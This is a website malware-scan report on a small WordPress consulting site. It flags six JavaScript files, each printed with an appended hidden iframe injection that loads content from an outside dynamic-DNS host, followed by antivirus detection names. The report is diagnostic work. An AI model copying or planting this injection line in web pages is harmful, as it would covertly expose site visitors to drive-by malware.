New scan:

Malware Scanner report for brianwhiteconsulting.com

Malicious/Suspicious/Total urls checked
6/0/8
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/6
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://brianwhiteconsulting.com/
200 OK
Content-Length: 15894
Content-Type: text/html
clean
http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.js?ver=1.7.2
200 OK
Content-Length: 95039
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createE
... 83555 bytes are skipped ...
bort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bF,"").replace(bK,bV[1]+"jQuery.noConflict();
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

Sophos
Mal/Iframe-AN

http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.cycle.all.min.js?ver=3.4
200 OK
Content-Length: 28058
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){var ver="2.65";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele
... 26699 bytes are skipped ...
t||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.easing.1.3.js
200 OK
Content-Length: 8275
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(t/=d)*t + b;
},
easeOutQuad: function (x, t, b, c, d) {
return -c *(t/=d)*(t-2) + b;
},
easeInOutQuad: function (x, t, b, c, d) {
if ((t/=d/2) < 1) return c/2*t*t + b;
retur
... 4311 bytes are skipped ...
e {
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
}
},
easeInOutBounce: function (x, t, b, c, d) {
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
}
});
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
VIPRE
Malware.JS.Generic (JS)
Sophos
Mal/Iframe-AN

http://brianwhiteconsulting.com/wp-content/themes/BusinessCard/js/jquery.fancybox-1.2.6.pack.js
200 OK
Content-Length: 9700
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(';(p($){$.q.1Q=p(){J O.2n(p(){n b=$(O).u(\'2o\');8(b.1d(/^3i\\(["\']?(.*\\.2p)["\']?\\)$/i)){b=3j.$1;$(O).u({\'2o\':\'3k\',\'1e\':"3l:3m.3n.3o(3p=D, 3q="+($(O).u(\'3r\'
... 8922 bytes are skipped ...
tWidth|scrollLeft|scrollTop|setInterval|66|fancy_bg_n|fancy_bg_ne|fancy_bg_e|fancy_bg_se|fancy_bg_s|fancy_bg_sw|fancy_bg_w|fancy_bg_nw|body|cellspacing|cellpadding|border|fancy_title_left|fancy_title_main|fancy_title_right|prepend|scrolling|contentWindow|open|300|560|340|666|ready|boxModel'.split('|'),0,{}));;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

http://brianwhiteconsulting.com/wp-includes/js/jquery/jquery.form.js?ver=2.73
200 OK
Content-Length: 11294
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(b){b.fn.ajaxSubmit=function(t){if(!this.length){a("ajaxSubmit: skipping submit process - no element selected");return this}if(typeof t=="function"){t={success:t}}var h=this.attr("action");var d=(typeof h==="string")?b.trim(h):"";if(d){d=(d.match(/^([^#]+)/)||[])[1]}d=d||window.location.href||"";t=b.extend(true,{url:d,success:b.ajaxSettings.success,type:this[0].getAttribute("method")||"GET",iframeSrc:/^https/i.test(window.location.href||"")?"javascript:false":"about:blank"},t);var u={};
... 10478 bytes are skipped ...
ption").selected(false)}this.selected=c}}})};function a(){if(b.fn.ajaxSubmit.debug){var c="[jquery.form] "+Array.prototype.join.call(arguments,"");if(window.console&&window.console.log){window.console.log(c)}else{if(window.opera&&window.opera.postError){window.opera.postError(c)}}}}})(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://brianwhiteconsulting.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.2
200 OK
Content-Length: 4772
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function() {
try {
jQuery('div.wpcf7 > form').ajaxForm({
beforeSubmit: wpcf7BeforeSubmit,
dataType: 'json',
success: wpcf7ProcessJson
});
} catch (e) {
}

try {
jQuery('div.wpcf7 > form').each(function(i, n) {
wpcf7ToggleSubmit(jQuery(n));
});
} catch (e) {
}

try {
if (_wpcf7.cached) {
jQuery('div.wpcf7 > form').each(function(i, n) {
... 4398 bytes are skipped ...
nction wpcf7ClearResponseOutput() {
jQuery('div.wpcf7-response-output').hide().empty().removeClass('wpcf7-mail-sent-ok wpcf7-mail-sent-ng wpcf7-validation-errors wpcf7-spam-blocked');
jQuery('span.wpcf7-not-valid-tip').remove();
jQuery('img.ajax-loader').css({ visibility: 'hidden' });
};document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://brianwhiteconsulting.com/test404page.js
404 Not Found
Content-Length: 15860
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: brianwhiteconsulting.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Apr 2014 16:20:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://brianwhiteconsulting.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: brianwhiteconsulting.com
Referer: http://www.google.com/search?q=brianwhiteconsulting.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=brianwhiteconsulting.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brianwhiteconsulting.com/

Result: brianwhiteconsulting.com is not infected or malware details are not published yet.